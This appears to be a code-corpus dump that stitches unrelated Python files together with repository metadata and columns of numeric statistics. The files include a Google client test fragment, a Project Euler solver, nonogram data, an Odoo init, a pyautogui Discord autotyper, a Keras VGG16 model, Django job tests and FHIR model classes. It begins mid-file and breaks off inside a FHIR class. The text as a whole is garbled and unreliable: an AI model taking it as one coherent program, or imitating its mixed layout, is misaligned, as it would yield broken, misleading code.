                credentials=mock_cred,
                credentials_file=None,
                host=client.DEFAULT_ENDPOINT,
                scopes=None,
                client_cert_source_for_mtls=None,
                quota_project_id=None,
                client_info=transports.base.DEFAULT_CLIENT_INFO,
                always_use_jwt_access=True,
            )
| 39.304688
| 108
| 0.693135
| 17,565
| 155,961
| 5.858013
| 0.028124
| 0.026405
| 0.030283
| 0.056873
| 0.923865
| 0.910706
| 0.894009
| 0.872852
| 0.857575
| 0.84083
| 0
| 0.004962
| 0.226005
| 155,961
| 3,967
| 109
| 39.314595
| 0.84744
| 0.149518
| 0
| 0.740368
| 0
| 0
| 0.119551
| 0.041156
| 0
| 0
| 0
| 0.000252
| 0.138146
| 1
| 0.044429
| false
| 0.000347
| 0.008678
| 0.000694
| 0.053801
| 0.001388
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0d9c67a8331f8f50fc55fff1504306d7c19aa75d
| 49
|
py
|
Python
|
src/003-largest-prime-factor/python/solve.py
|
xfbs/ProjectEulerRust
|
e26768c56ff87b029cb2a02f56dc5cd32e1f7c87
|
[
"MIT"
] | 1
|
2018-01-26T21:18:12.000Z
|
2018-01-26T21:18:12.000Z
|
src/003-largest-prime-factor/python/solve.py
|
xfbs/ProjectEulerRust
|
e26768c56ff87b029cb2a02f56dc5cd32e1f7c87
|
[
"MIT"
] | 3
|
2017-12-09T14:49:30.000Z
|
2017-12-09T14:59:39.000Z
|
src/003-largest-prime-factor/python/solve.py
|
xfbs/ProjectEulerRust
|
e26768c56ff87b029cb2a02f56dc5cd32e1f7c87
|
[
"MIT"
] | null | null | null |
# Project Euler problem 3: print the largest prime factor of 600851475143.
# NOTE(review): `solver` is a project-local module; its solve() is assumed
# to return the answer for the given number — confirm against solver.py.
import solver
print(solver.solve(600851475143))
| 12.25
| 33
| 0.816327
| 6
| 49
| 6.666667
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.266667
| 0.081633
| 49
| 3
| 34
| 16.333333
| 0.622222
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0.5
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
|
0
| 7
|
21f5fc0296c747eb0ca3197396dd0adfa83eda6c
| 1,666
|
py
|
Python
|
google_or_tools/nonogram_pbn_forever.py
|
Wikunia/hakank
|
030bc928d2efe8dcbc5118bda3f8ae9575d0fd13
|
[
"MIT"
] | 279
|
2015-01-10T09:55:35.000Z
|
2022-03-28T02:34:03.000Z
|
google_or_tools/nonogram_pbn_forever.py
|
Wikunia/hakank
|
030bc928d2efe8dcbc5118bda3f8ae9575d0fd13
|
[
"MIT"
] | 10
|
2017-10-05T15:48:50.000Z
|
2021-09-20T12:06:52.000Z
|
google_or_tools/nonogram_pbn_forever.py
|
Wikunia/hakank
|
030bc928d2efe8dcbc5118bda3f8ae9575d0fd13
|
[
"MIT"
] | 83
|
2015-01-20T03:44:00.000Z
|
2022-03-13T23:53:06.000Z
|
# webpbn.com Puzzle #6574: Lasts Forever
# Copyright 2009 by Gator
#
# Nonogram clue data: each rule is a fixed-width list of run lengths,
# left-padded with zeros to the rule length.  Consumed by a nonogram
# solver elsewhere in the project.
rows = 25           # number of puzzle rows
row_rule_len = 8    # fixed width of each row clue (zero-padded)
row_rules = [
    [0, 1, 2, 2, 2, 2, 2, 1],
    [1, 2, 2, 2, 2, 2, 1, 1],
    [0, 0, 0, 0, 0, 0, 1, 1],
    [0, 0, 0, 0, 0, 0, 1, 1],
    [0, 0, 0, 0, 0, 1, 3, 1],
    [0, 0, 0, 0, 0, 1, 13, 1],
    [0, 0, 0, 0, 0, 1, 13, 1],
    [0, 0, 0, 0, 0, 1, 13, 1],
    [0, 0, 0, 0, 1, 4, 4, 1],
    [0, 0, 0, 1, 4, 3, 4, 1],
    [0, 0, 0, 1, 4, 5, 4, 1],
    [0, 0, 0, 0, 0, 1, 7, 1],
    [0, 0, 0, 0, 0, 1, 7, 1],
    [0, 0, 0, 0, 0, 1, 7, 1],
    [0, 0, 0, 0, 0, 1, 7, 1],
    [0, 0, 0, 0, 1, 1, 5, 1],
    [0, 0, 0, 0, 1, 2, 6, 1],
    [0, 0, 0, 0, 1, 4, 6, 1],
    [0, 0, 0, 0, 1, 6, 6, 1],
    [0, 0, 0, 0, 0, 1, 3, 1],
    [0, 0, 0, 0, 0, 1, 1, 1],
    [0, 0, 0, 0, 0, 0, 1, 1],
    [0, 0, 0, 0, 0, 0, 1, 1],
    [1, 1, 2, 2, 2, 2, 2, 1],
    [0, 1, 2, 2, 2, 2, 2, 1]
]
cols = 25           # number of puzzle columns
col_rule_len = 8    # fixed width of each column clue (zero-padded)
col_rules = [
    [0, 1, 2, 2, 2, 2, 2, 1],
    [1, 1, 2, 2, 2, 2, 2, 1],
    [0, 0, 0, 0, 0, 0, 1, 1],
    [0, 0, 0, 0, 0, 0, 1, 1],
    [0, 0, 0, 0, 0, 0, 1, 1],
    [0, 0, 0, 0, 0, 1, 2, 1],
    [0, 0, 0, 0, 1, 6, 1, 1],
    [0, 0, 0, 0, 1, 6, 2, 1],
    [0, 0, 0, 0, 1, 6, 3, 1],
    [0, 0, 0, 0, 1, 4, 8, 1],
    [0, 0, 0, 1, 3, 5, 2, 1],
    [0, 0, 0, 1, 4, 8, 2, 1],
    [0, 0, 0, 1, 4, 9, 2, 1],
    [0, 0, 0, 0, 1, 4, 11, 1],
    [0, 0, 0, 0, 1, 3, 9, 1],
    [0, 0, 0, 0, 1, 4, 8, 1],
    [0, 0, 0, 0, 1, 6, 3, 1],
    [0, 0, 0, 0, 1, 6, 2, 1],
    [0, 0, 0, 0, 1, 6, 1, 1],
    [0, 0, 0, 0, 0, 1, 2, 1],
    [0, 0, 0, 0, 0, 0, 1, 1],
    [0, 0, 0, 0, 0, 0, 1, 1],
    [0, 0, 0, 0, 0, 0, 1, 1],
    [1, 2, 2, 2, 2, 2, 1, 1],
    [0, 1, 2, 2, 2, 2, 2, 1]
]
| 26.444444
| 40
| 0.306723
| 426
| 1,666
| 1.185446
| 0.070423
| 0.605941
| 0.659406
| 0.546535
| 0.80396
| 0.79802
| 0.762376
| 0.655446
| 0.655446
| 0.627723
| 0
| 0.407805
| 0.384754
| 1,666
| 62
| 41
| 26.870968
| 0.084878
| 0.036615
| 0
| 0.637931
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
df41c5093ba2ea689cb15cdede3fbd225dc9053f
| 150
|
py
|
Python
|
addons14/base_phone/models/__init__.py
|
odoochain/addons_oca
|
55d456d798aebe16e49b4a6070765f206a8885ca
|
[
"MIT"
] | 1
|
2021-06-10T14:59:13.000Z
|
2021-06-10T14:59:13.000Z
|
addons14/base_phone/models/__init__.py
|
odoochain/addons_oca
|
55d456d798aebe16e49b4a6070765f206a8885ca
|
[
"MIT"
] | null | null | null |
addons14/base_phone/models/__init__.py
|
odoochain/addons_oca
|
55d456d798aebe16e49b4a6070765f206a8885ca
|
[
"MIT"
] | 1
|
2021-04-09T09:44:44.000Z
|
2021-04-09T09:44:44.000Z
|
from . import phone_validation_mixin
from . import res_company
from . import res_config_settings
from . import res_partner
from . import phone_common
| 25
| 36
| 0.833333
| 22
| 150
| 5.363636
| 0.5
| 0.423729
| 0.330508
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.133333
| 150
| 5
| 37
| 30
| 0.907692
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
df54a9d103a7023d203f2ea696805f29fac7714a
| 833
|
py
|
Python
|
main.py
|
XephonineDeb/DankMemerCoinGrindFarmer
|
bf4fc4806891dac42358a7b745f993d9ec295a31
|
[
"MIT"
] | null | null | null |
main.py
|
XephonineDeb/DankMemerCoinGrindFarmer
|
bf4fc4806891dac42358a7b745f993d9ec295a31
|
[
"MIT"
] | null | null | null |
main.py
|
XephonineDeb/DankMemerCoinGrindFarmer
|
bf4fc4806891dac42358a7b745f993d9ec295a31
|
[
"MIT"
] | 1
|
2022-02-05T20:35:58.000Z
|
2022-02-05T20:35:58.000Z
|
# Dank Memer auto-grinder: endlessly types currency commands into the
# focused window.  pyautogui emits real OS-level keystrokes, so the
# Discord chat box must keep keyboard focus for the whole run.
import pyautogui
import time

while True:
    # interval=0.1 pauses a tenth of a second between keystrokes
    # (NOTE(review): the original comments said "quarter-second", which
    # does not match interval=0.1).
    pyautogui.write('pls beg', interval=0.1)
    pyautogui.press('enter')
    pyautogui.write('pls hunt', interval=0.1)
    pyautogui.press('enter')
    pyautogui.write('pls fish', interval=0.1)
    pyautogui.press('enter')
    pyautogui.write('pls beg', interval=0.1)
    pyautogui.press('enter')
    pyautogui.write('pls kill @Dank', interval=0.1)
    pyautogui.press('enter')
    # Second Enter — presumably confirms/dismisses a prompt; verify in-game.
    pyautogui.press('enter')
    pyautogui.write("pls search")
    pyautogui.press('enter')
    time.sleep(2)
    # Click a fixed screen coordinate (a search option button); this is
    # screen-resolution and window-layout dependent.
    pyautogui.click(515,746)
    time.sleep(2)
| 41.65
| 103
| 0.716687
| 122
| 833
| 4.893443
| 0.262295
| 0.164154
| 0.222781
| 0.281407
| 0.80737
| 0.80737
| 0.762144
| 0.762144
| 0.762144
| 0.762144
| 0
| 0.025751
| 0.160864
| 833
| 19
| 104
| 43.842105
| 0.828326
| 0.304922
| 0
| 0.578947
| 0
| 0
| 0.16065
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.105263
| 0
| 0.105263
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
df5c36424d5c237e241aa5572fe32834c5526434
| 148
|
py
|
Python
|
Section 13/shape.py
|
samlvlen/PacktPublishingz
|
1c71ffd71a649e876fc507a96ccd4597649218e5
|
[
"MIT"
] | 7
|
2019-10-15T08:24:58.000Z
|
2021-04-20T00:42:48.000Z
|
Section 13/shape.py
|
samlvlen/PacktPublishingz
|
1c71ffd71a649e876fc507a96ccd4597649218e5
|
[
"MIT"
] | null | null | null |
Section 13/shape.py
|
samlvlen/PacktPublishingz
|
1c71ffd71a649e876fc507a96ccd4597649218e5
|
[
"MIT"
] | 13
|
2019-11-17T13:22:58.000Z
|
2020-12-05T17:10:58.000Z
|
class Shape:
    """A shape carrying a single, privately stored color.

    The color is reachable only through the explicit accessor pair
    ``set_color``/``get_color``; until ``set_color`` is called,
    ``get_color`` yields ``None``.
    """

    __color = None  # class-level default; name-mangled to _Shape__color

    def set_color(self, color):
        """Remember *color* as this shape's current color."""
        self.__color = color

    def get_color(self):
        """Return the most recently set color, or ``None`` if unset."""
        return self.__color
| 16.444444
| 31
| 0.614865
| 19
| 148
| 4.368421
| 0.473684
| 0.325301
| 0.337349
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.304054
| 148
| 8
| 32
| 18.5
| 0.805825
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0
| 0.166667
| 0.833333
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
df8030c9c1aaea7b4ff1b25a2958948ba4189868
| 2,158
|
py
|
Python
|
examples/2.VGG16.py
|
hmeng22/NNNotes
|
444e6da2b7c962476714126be516727c2a75cb1f
|
[
"Apache-2.0"
] | null | null | null |
examples/2.VGG16.py
|
hmeng22/NNNotes
|
444e6da2b7c962476714126be516727c2a75cb1f
|
[
"Apache-2.0"
] | null | null | null |
examples/2.VGG16.py
|
hmeng22/NNNotes
|
444e6da2b7c962476714126be516727c2a75cb1f
|
[
"Apache-2.0"
] | null | null | null |
from keras.models import Sequential
from keras.layers import Dense, Flatten, Dropout
from keras.layers.convolutional import Conv2D, MaxPooling2D

# VGG16 (Simonyan & Zisserman, 2014): five convolutional blocks of 3x3
# kernels, each closed by 2x2 max pooling, followed by two 4096-unit
# fully connected layers and a 1000-way softmax classifier.
model = Sequential()

# Block 1: two 64-filter convolutions.
model.add(Conv2D(64, (3, 3), strides=(1, 1), input_shape=(224, 224, 3), padding='same', activation='relu', kernel_initializer='uniform'))
model.add(Conv2D(64, (3, 3), strides=(1, 1), padding='same', activation='relu', kernel_initializer='uniform'))
model.add(MaxPooling2D(pool_size=(2, 2)))

# Block 2: two 128-filter convolutions.
# Fix: the first layer here used a (3, 2) kernel — VGG16 uses 3x3
# kernels throughout the network.
model.add(Conv2D(128, (3, 3), strides=(1, 1), padding='same', activation='relu', kernel_initializer='uniform'))
model.add(Conv2D(128, (3, 3), strides=(1, 1), padding='same', activation='relu', kernel_initializer='uniform'))
model.add(MaxPooling2D(pool_size=(2, 2)))

# Block 3: three 256-filter convolutions.
model.add(Conv2D(256, (3, 3), strides=(1, 1), padding='same', activation='relu', kernel_initializer='uniform'))
model.add(Conv2D(256, (3, 3), strides=(1, 1), padding='same', activation='relu', kernel_initializer='uniform'))
model.add(Conv2D(256, (3, 3), strides=(1, 1), padding='same', activation='relu', kernel_initializer='uniform'))
model.add(MaxPooling2D(pool_size=(2, 2)))

# Block 4: three 512-filter convolutions.
model.add(Conv2D(512, (3, 3), strides=(1, 1), padding='same', activation='relu', kernel_initializer='uniform'))
model.add(Conv2D(512, (3, 3), strides=(1, 1), padding='same', activation='relu', kernel_initializer='uniform'))
model.add(Conv2D(512, (3, 3), strides=(1, 1), padding='same', activation='relu', kernel_initializer='uniform'))
model.add(MaxPooling2D(pool_size=(2, 2)))

# Block 5: three 512-filter convolutions.
model.add(Conv2D(512, (3, 3), strides=(1, 1), padding='same', activation='relu', kernel_initializer='uniform'))
model.add(Conv2D(512, (3, 3), strides=(1, 1), padding='same', activation='relu', kernel_initializer='uniform'))
model.add(Conv2D(512, (3, 3), strides=(1, 1), padding='same', activation='relu', kernel_initializer='uniform'))
model.add(MaxPooling2D(pool_size=(2, 2)))

# Classifier head: FC-4096, FC-4096 (each with dropout), FC-1000 softmax.
model.add(Flatten())
model.add(Dense(4096, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(4096, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(1000, activation='softmax'))

model.compile(loss='categorical_crossentropy', optimizer='sgd', metrics=['accuracy'])
model.summary()
| 67.4375
| 137
| 0.716867
| 311
| 2,158
| 4.909968
| 0.154341
| 0.125737
| 0.119188
| 0.212836
| 0.828422
| 0.823838
| 0.823838
| 0.823838
| 0.823838
| 0.804846
| 0
| 0.070682
| 0.069045
| 2,158
| 31
| 138
| 69.612903
| 0.689398
| 0
| 0
| 0.6
| 0
| 0
| 0.113531
| 0.011121
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.1
| 0
| 0.1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
800387084af8fb0da6714f4e546c8dd82f0fca66
| 11,167
|
py
|
Python
|
src/jobs/tests/test_job_creator.py
|
Musacca/predict-python
|
97f2cc62d5891057cadd24b7905662be625dff9b
|
[
"MIT"
] | null | null | null |
src/jobs/tests/test_job_creator.py
|
Musacca/predict-python
|
97f2cc62d5891057cadd24b7905662be625dff9b
|
[
"MIT"
] | 1
|
2020-04-20T19:41:07.000Z
|
2020-04-20T19:41:07.000Z
|
src/jobs/tests/test_job_creator.py
|
Musacca/predict-python
|
97f2cc62d5891057cadd24b7905662be625dff9b
|
[
"MIT"
] | null | null | null |
from django.test.testcases import TestCase
from src.jobs.job_creator import generate, generate_labelling, update
from src.jobs.models import JobTypes
from src.jobs.tasks import prediction_task
from src.utils.django_orm import duplicate_orm_row
from src.utils.tests_utils import create_test_job
class TestJobCreator(TestCase):
    """Unit tests for src.jobs.job_creator: generate, generate_labelling, update."""

    def test_generate(self):
        # A job generated from the default classification payload should
        # equal the fixture job once volatile fields (ids, timestamps,
        # optimizer state, derived encoding/labelling fields) are removed
        # from both sides.
        job = create_test_job()
        initial_job = job.to_dict()
        del initial_job['id']
        del initial_job['created_date']
        del initial_job['modified_date']
        del initial_job['hyperparameter_optimizer']
        del initial_job['encoding']['features']
        del initial_job['labelling']['attribute_name']
        generated_job = generate(split=job.split, payload={
            'type': 'classification',
            'split_id': 1,
            'config': {
                'clusterings': ['noCluster'],
                'encodings': ['simpleIndex'],
                'encoding': {
                    'padding': False,
                    'prefix_length': 1,
                    'generation_type': 'only',
                    'add_remaining_time': False,
                    'add_elapsed_time': False,
                    'add_executed_events': False,
                    'add_resources_used': False,
                    'add_new_traces': False,
                    'features': [],
                },
                'create_models': False,
                'methods': ['randomForest'],
                'kmeans': {},
                'incremental_train': {
                    'base_model': None,
                },
                'hyperparameter_optimizer': {
                    'algorithm_type': 'tpe',
                    'max_evaluations': 10,
                    'performance_metric': 'rmse',
                    'type': 'none',
                },
                'labelling': {
                    'type': 'next_activity',
                    'attribute_name': '',
                    'threshold_type': 'threshold_mean',
                    'threshold': 0,
                },
                'classification.decisionTree': {},
                'classification.knn': {},
                'classification.randomForest': {},
                'classification.adaptiveTree': {},
                'classification.hoeffdingTree': {},
                'classification.multinomialNB': {},
                'classification.perceptron': {},
                'classification.SGDClassifier': {},
                'classification.xgboost': {},
                'classification.nn': {},
                'regression.lasso': {},
                'regression.linear': {},
                'regression.randomForest': {},
                'regression.xgboost': {},
                'regression.nn': {},
                'time_series_prediction.rnn': {}
            }
        })[0].to_dict()
        del generated_job['id']
        del generated_job['created_date']
        del generated_job['modified_date']
        del generated_job['hyperparameter_optimizer']
        del generated_job['encoding']['features']
        del generated_job['labelling']['attribute_name']
        self.assertDictEqual(initial_job, generated_job)

    def test_generate_up_to(self):
        # Same as test_generate but with prefix_length=2 and
        # generation_type='up_to'; encoding['task_generation_type'] is
        # additionally excluded because it differs from the fixture.
        job = create_test_job()
        initial_job = job.to_dict()
        del initial_job['id']
        del initial_job['created_date']
        del initial_job['modified_date']
        del initial_job['hyperparameter_optimizer']
        del initial_job['encoding']['features']
        del initial_job['encoding']['task_generation_type']
        del initial_job['labelling']['attribute_name']
        generated_job = generate(split=job.split, payload={
            'type': 'classification',
            'split_id': 1,
            'config': {
                'clusterings': ['noCluster'],
                'encodings': ['simpleIndex'],
                'encoding': {
                    'padding': False,
                    'prefix_length': 2,
                    'generation_type': 'up_to',
                    'add_remaining_time': False,
                    'add_elapsed_time': False,
                    'add_executed_events': False,
                    'add_resources_used': False,
                    'add_new_traces': False,
                    'features': [],
                },
                'create_models': False,
                'methods': ['randomForest'],
                'kmeans': {},
                'incremental_train': {
                    'base_model': None,
                },
                'hyperparameter_optimizer': {
                    'algorithm_type': 'tpe',
                    'max_evaluations': 10,
                    'performance_metric': 'rmse',
                    'type': 'none',
                },
                'labelling': {
                    'type': 'next_activity',
                    'attribute_name': '',
                    'threshold_type': 'threshold_mean',
                    'threshold': 0,
                },
                'classification.decisionTree': {},
                'classification.knn': {},
                'classification.randomForest': {},
                'classification.adaptiveTree': {},
                'classification.hoeffdingTree': {},
                'classification.multinomialNB': {},
                'classification.perceptron': {},
                'classification.SGDClassifier': {},
                'classification.xgboost': {},
                'classification.nn': {},
                'regression.lasso': {},
                'regression.linear': {},
                'regression.randomForest': {},
                'regression.xgboost': {},
                'regression.nn': {},
                'time_series_prediction.rnn': {}
            }
        })[0].to_dict()
        del generated_job['id']
        del generated_job['created_date']
        del generated_job['modified_date']
        del generated_job['hyperparameter_optimizer']
        del generated_job['encoding']['features']
        del generated_job['encoding']['task_generation_type']
        del generated_job['labelling']['attribute_name']
        self.assertDictEqual(initial_job, generated_job)

    def test_generate_labelling(self):
        # Labelling jobs are compared piecewise (type, split, encoding,
        # labelling) rather than as whole dicts.
        job = create_test_job()
        job.type = JobTypes.LABELLING.value
        job.save()
        generated_job = generate_labelling(split=job.split, payload={
            'type': 'labelling',
            'split_id': 1,
            'config': {
                'encodings': ['simpleIndex'],
                'encoding': {
                    'padding': False,
                    'prefix_length': 1,
                    'generation_type': 'only',
                    'add_remaining_time': False,
                    'add_elapsed_time': False,
                    'add_executed_events': False,
                    'add_resources_used': False,
                    'add_new_traces': False,
                    'features': [],
                },
                'create_models': False,
                'labelling': {
                    'type': 'next_activity',
                    'attribute_name': '',
                    'threshold_type': 'threshold_mean',
                    'threshold': 0,
                }
            }
        })[0]
        self.assertEqual(job.type, generated_job.type)
        self.assertEqual(job.split, generated_job.split)
        # Blank derived fields on both sides before comparing.
        job.encoding.features = None
        generated_job.encoding.features = None
        self.assertDictEqual(job.encoding.to_dict(), generated_job.encoding.to_dict())
        job.labelling.attribute_name = None
        generated_job.labelling.attribute_name = None
        self.assertDictEqual(job.labelling.to_dict(), generated_job.labelling.to_dict())

    def test_generate_labelling_up_to(self):
        # 'up_to' variant of the labelling test; task_generation_type is
        # also neutralised before comparison.
        job = create_test_job()
        job.type = JobTypes.LABELLING.value
        job.save()
        generated_job = generate_labelling(split=job.split, payload={
            'type': 'labelling',
            'split_id': 1,
            'config': {
                'encodings': ['simpleIndex'],
                'encoding': {
                    'padding': False,
                    'prefix_length': 2,
                    'generation_type': 'up_to',
                    'add_remaining_time': False,
                    'add_elapsed_time': False,
                    'add_executed_events': False,
                    'add_resources_used': False,
                    'add_new_traces': False,
                    'features': [],
                },
                'create_models': False,
                'labelling': {
                    'type': 'next_activity',
                    'attribute_name': '',
                    'threshold_type': 'threshold_mean',
                    'threshold': 0,
                }
            }
        })[0]
        self.assertEqual(job.type, generated_job.type)
        self.assertEqual(job.split, generated_job.split)
        job.encoding.features = None
        job.encoding.task_generation_type = None
        generated_job.encoding.features = None
        generated_job.encoding.task_generation_type = None
        self.assertDictEqual(job.encoding.to_dict(), generated_job.encoding.to_dict())
        job.labelling.attribute_name = None
        generated_job.labelling.attribute_name = None
        self.assertDictEqual(job.labelling.to_dict(), generated_job.labelling.to_dict())

    def test_update(self):
        # Exercises update() against a duplicated, already-trained job;
        # the final equality assertion remains disabled (see TODO below).
        job = create_test_job()
        prediction_task(job.id)
        job2 = duplicate_orm_row(job)
        job.refresh_from_db()
        job2.incremental_train = job
        job2.type = JobTypes.UPDATE.value
        job2.save()
        initial_job = job2#.to_dict()
        generated_job = update(split=job.split, payload={
            'type': 'classification',
            'split_id': 1,
            'config': {
                'clusterings': ['noCluster'],
                'encodings': ['simpleIndex'],
                'encoding': {
                    'padding': False,
                    'prefix_length': 1,
                    'generation_type': 'only',
                    'add_remaining_time': False,
                    'add_elapsed_time': False,
                    'add_executed_events': False,
                    'add_resources_used': False,
                    'add_new_traces': False,
                    'features': [],
                },
                'create_models': False,
                'methods': ['randomForest'],
                'kmeans': {},
                'incremental_train': [job.id],
                'hyperparameter_optimizer': {
                    'algorithm_type': 'tpe',
                    'max_evaluations': 10,
                    'performance_metric': 'rmse',
                    'type': 'none',
                },
                'labelling': {
                    'type': 'next_activity',
                    'attribute_name': '',
                    'threshold_type': 'threshold_mean',
                    'threshold': 0,
                }
            }
        })[0]#.to_dict()
        #TODO: probably missing to_dict for incremental model
        # self.assertEqual(initial_job, generated_job)
| 37.854237
| 88
| 0.492702
| 885
| 11,167
| 5.937853
| 0.132203
| 0.07764
| 0.03216
| 0.038059
| 0.892674
| 0.888868
| 0.866032
| 0.852521
| 0.852521
| 0.852521
| 0
| 0.004545
| 0.389182
| 11,167
| 294
| 89
| 37.982993
| 0.76587
| 0.010477
| 0
| 0.831461
| 1
| 0
| 0.271773
| 0.062466
| 0
| 0
| 0
| 0.003401
| 0.037453
| 1
| 0.018727
| false
| 0
| 0.022472
| 0
| 0.044944
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
801afd5321897c79553c21f4d202e3485214c17d
| 101
|
py
|
Python
|
common_utils/constants/__init__.py
|
cm107/common_utils
|
4b911efe9f8cdec16ecb2a983e16f772be05076c
|
[
"MIT"
] | null | null | null |
common_utils/constants/__init__.py
|
cm107/common_utils
|
4b911efe9f8cdec16ecb2a983e16f772be05076c
|
[
"MIT"
] | null | null | null |
common_utils/constants/__init__.py
|
cm107/common_utils
|
4b911efe9f8cdec16ecb2a983e16f772be05076c
|
[
"MIT"
] | null | null | null |
from .number_constants import *
from .extension_constants import *
from .color_constants import Color
| 33.666667
| 34
| 0.841584
| 13
| 101
| 6.307692
| 0.461538
| 0.54878
| 0.463415
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.108911
| 101
| 3
| 35
| 33.666667
| 0.911111
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
80318966e9b9ab91419d3b68aabbf7f436d18a9f
| 13,441
|
py
|
Python
|
fhirclient/models/parameters.py
|
JamesSkane/smart_resources
|
85c362542b85ebc43ec00cd04915b114ee95f9c0
|
[
"Apache-2.0"
] | null | null | null |
fhirclient/models/parameters.py
|
JamesSkane/smart_resources
|
85c362542b85ebc43ec00cd04915b114ee95f9c0
|
[
"Apache-2.0"
] | null | null | null |
fhirclient/models/parameters.py
|
JamesSkane/smart_resources
|
85c362542b85ebc43ec00cd04915b114ee95f9c0
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Generated from FHIR 0.5.0.5149 (http://hl7.org/fhir/StructureDefinition/Parameters) on 2015-07-06.
# 2015, SMART Health IT.
from . import address
from . import attachment
from . import codeableconcept
from . import coding
from . import contactpoint
from . import fhirdate
from . import fhirelement
from . import fhirreference
from . import humanname
from . import identifier
from . import period
from . import quantity
from . import range
from . import ratio
from . import resource
from . import signature
from . import timing
class Parameters(resource.Resource):
    """ Operation Request or Response.

    This special resource type is used to represent an
    [operation](operations.html) request and response. It has no other use,
    and there is no RESTful endpoint associated with it.
    """

    # Canonical FHIR resource type name, used during (de)serialization.
    resource_name = "Parameters"

    def __init__(self, jsondict=None):
        """ Initialize all valid properties.

        `jsondict` is an optional dict of JSON values used to populate
        the instance (handled by the base class).
        """

        self.parameter = None
        """ Operation Parameter.
        List of `ParametersParameter` items (represented as `dict` in JSON). """

        super(Parameters, self).__init__(jsondict)

    def elementProperties(self):
        # Extend the base class's property table with this resource's own
        # ("json name", "attribute name", type, is_list) entries.
        js = super(Parameters, self).elementProperties()
        js.extend([
            ("parameter", "parameter", ParametersParameter, True),
        ])
        return js
class ParametersParameter(fhirelement.FHIRElement):
    """ Operation Parameter.

    A parameter passed to or received from the operation.

    Per the FHIR "value[x]" choice-of-type convention, one of the
    `value*` attributes (or `resource`/`part`) is expected to carry the
    parameter's payload.
    """

    # Canonical FHIR element name, used during (de)serialization.
    resource_name = "ParametersParameter"

    def __init__(self, jsondict=None):
        """ Initialize all valid properties.

        `jsondict` is an optional dict of JSON values used to populate
        the instance (handled by the base class).
        """

        self.name = None
        """ Name from the definition.
        Type `str`. """

        self.part = None
        """ Named part of a parameter (e.g. Tuple).
        List of `ParametersParameterPart` items (represented as `dict` in JSON). """

        self.resource = None
        """ If parameter is a whole resource.
        Type `Resource` (represented as `dict` in JSON). """

